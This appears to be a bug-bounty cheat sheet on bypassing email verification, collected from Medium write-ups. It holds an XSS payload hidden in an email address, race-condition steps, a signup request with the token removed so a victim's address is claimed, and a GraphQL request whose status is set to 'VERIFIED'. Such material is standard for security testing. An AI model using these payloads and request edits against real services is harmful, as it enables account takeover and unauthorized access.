Email Verification Bypass

Email injections

"><svg/onload=confirm(1)>"@x.y

How I Discovered an Email Verification BypassMedium

Race Condition

Intercept change email request and send it to repeater

Send the request at least 2 times so send it to the repeater again

Repeater 1

Repeater 2

Create group to be able to send the two requests in the same time

Send group in parallel

Email verification bypass due to race condition.Medium

Remove the Token

Modify the email parameter from attacker@gmail.com to a different email address (for this example, victim@gmail.com)

https://app.example.me/signup/activation?token=c6dc625e-5b5a-4627-b39c-98e0dfcbc22f&source=trial&email=victim@gmail.com&chkNR=false

Intercept the request

{
  "firstName": "Attacker",
  "lastName": "Smith",
  "email": "victim@gmail.com",
  "password": "strongpassword123",
  "token": "c6dc625e-5b5a-4627-b39c-98e0dfcbc22f"
}

Remove the token

{
  "firstName": "Attacker",
  "lastName": "Smith",
  "email": "victim@gmail.com",
  "password": "strongpassword123",
}

How I Discovered an Email Verification BypassMedium

GraphQL Request

[{"operationName":"solutionsResendEmailVerification","variables":{"input":{"entityId":"511","status":"PENDING","requestReferrer":"SOLUTIONS_CREATE"}},"query":"mutation solutionsResendEmailVerification($input: ResendEmailInput!) {\n resendEmailVerification(input: $input) {\n success\n __typename\n }\n}\n"}]

Change STATUS to “VERIFIED,” refresh the page, and gain access to the solutions without verifying the address

1200 $ Email verification Bypass from P4 TO P2Medium

Broken Authentication

Broken Authentication To Email Verification Bypass (P4)Medium